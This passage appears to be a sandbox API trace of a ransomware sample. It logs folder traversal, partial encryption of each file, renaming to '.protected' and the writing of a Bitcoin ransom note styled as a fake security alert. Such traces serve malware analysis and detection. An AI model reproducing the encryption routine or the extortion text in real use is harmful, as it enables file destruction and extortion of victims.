lpString2="Windows") returned -1 [0050.019] lstrcmpiW (lpString1="PubLR.cab", lpString2="Program Files") returned 1 [0050.019] lstrcmpiW (lpString1="PubLR.cab", lpString2="Program Files (x86)") returned 1 [0050.020] lstrcmpiW (lpString1="PubLR.cab", lpString2="$Recycle.bin") returned 1 [0050.020] lstrcmpiW (lpString1="PubLR.cab", lpString2="System Volume Information") returned -1 [0050.020] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0050.020] StrStrIW (lpFirst="PubLR.cab", lpSrch=".protected") returned 0x0 [0050.020] lstrcmpW (lpString1="PubLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0050.020] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0050.020] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, 
pdwDataLen=0x295f154*=0x30) returned 1 [0050.020] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0050.020] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0050.020] StrStrW (lpFirst="PubLR.cab", lpSrch=".txt") returned 0x0 [0050.020] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0050.020] StrStrW (lpFirst="PubLR.cab", lpSrch=".rar") returned 0x0 [0050.020] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0050.020] StrStrW (lpFirst="PubLR.cab", lpSrch=".zip") returned 0x0 [0050.020] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0050.030] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.030] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0050.030] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0050.030] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, 
lpOverlapped=0x0) returned 1 [0050.037] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0050.037] CloseHandle (hObject=0xb4) returned 1 [0050.361] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.protected") returned 86 [0050.361] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.protected")) returned 1 [0050.362] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0050.362] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0050.362] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0050.362] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0050.362] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0050.362] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0050.362] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0050.362] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0050.362] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0050.362] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0050.362] CryptEncrypt (in: 
hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0050.362] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0050.363] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0050.363] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0050.363] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0050.363] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0050.363] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0050.363] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0050.363] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x648, lpOverlapped=0x0) returned 1 [0050.518] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff9b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.518] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x648, lpOverlapped=0x0) returned 1 [0050.518] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0050.519] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0050.519] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0050.519] CloseHandle (hObject=0xb4) returned 1 [0050.519] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0050.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0050.520] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0050.520] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0050.520] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0050.520] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0050.520] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0050.520] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0050.521] lstrlenA (lpString="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") returned 684 [0050.521] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0050.521] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0050.521] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0050.521] CloseHandle (hObject=0xa4) returned 1 [0050.521] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0050.521] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0050.521] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0050.521] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0050.522] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0050.522] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0050.522] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C") returned 66 [0050.522] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0050.522] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0050.522] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*") returned 68 [0050.522] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0051.359] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0051.359] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0051.359] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0051.359] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0051.359] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0051.359] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\.") returned 68 [0051.359] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0051.359] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0051.359] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0051.359] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0051.359] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0051.359] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\." 
(normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0051.359] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0051.359] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0051.359] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0051.359] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0051.359] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0051.359] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0051.359] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\..") returned 69 [0051.359] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0051.359] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0051.359] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0051.359] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0051.359] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0051.359] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0051.359] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0051.359] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0051.359] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="Windows") returned -1 [0051.360] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="Program Files") returned -1 [0051.360] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="Program Files (x86)") returned -1 [0051.360] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="$Recycle.bin") returned 1 [0051.360] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="System Volume Information") returned -1 [0051.360] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0051.360] StrStrIW (lpFirst="OutlkLR.cab", lpSrch=".protected") returned 0x0 [0051.360] lstrcmpW (lpString1="OutlkLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0051.360] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0051.360] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0051.360] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0051.360] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0051.360] StrStrW (lpFirst="OutlkLR.cab", 
lpSrch=".txt") returned 0x0 [0051.360] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0051.360] StrStrW (lpFirst="OutlkLR.cab", lpSrch=".rar") returned 0x0 [0051.360] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0051.360] StrStrW (lpFirst="OutlkLR.cab", lpSrch=".zip") returned 0x0 [0051.360] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0051.418] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0051.418] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0051.418] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0051.418] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0051.431] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0051.431] CloseHandle (hObject=0xb4) returned 1 [0051.801] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.protected") returned 88 [0051.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.protected")) returned 1 [0051.801] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0051.801] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="Windows") returned -1 [0051.801] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="Program Files") returned -1 [0051.801] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="Program Files (x86)") returned -1 [0051.801] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="$Recycle.bin") returned 1 [0051.801] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="System Volume Information") returned -1 [0051.801] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0051.801] StrStrIW (lpFirst="OutlookMUI.msi", lpSrch=".protected") returned 0x0 [0051.801] lstrcmpW (lpString1="OutlookMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0051.801] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0051.801] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0051.801] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xb4 [0051.802] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0051.802] StrStrW (lpFirst="OutlookMUI.msi", lpSrch=".txt") returned 0x0 [0051.802] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0051.802] StrStrW (lpFirst="OutlookMUI.msi", lpSrch=".rar") returned 0x0 [0051.802] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 81 [0051.802] StrStrW (lpFirst="OutlookMUI.msi", lpSrch=".zip") returned 0x0 [0051.802] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0052.141] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0052.141] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0052.142] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0052.142] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0052.579] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0052.580] CloseHandle (hObject=0xb4) returned 1 [0052.706] wnsprintfW (in: pszDest=0x495c48, 
cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.protected") returned 91 [0052.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.protected")) returned 1 [0052.707] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0052.707] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="Windows") returned -1 [0052.707] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="Program Files") returned -1 [0052.707] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="Program Files (x86)") returned -1 [0052.707] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="$Recycle.bin") returned 1 [0052.707] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="System Volume Information") returned -1 [0052.707] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0052.707] StrStrIW (lpFirst="OutlookMUI.xml", lpSrch=".protected") returned 0x0 [0052.707] lstrcmpW (lpString1="OutlookMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0052.707] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0052.707] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 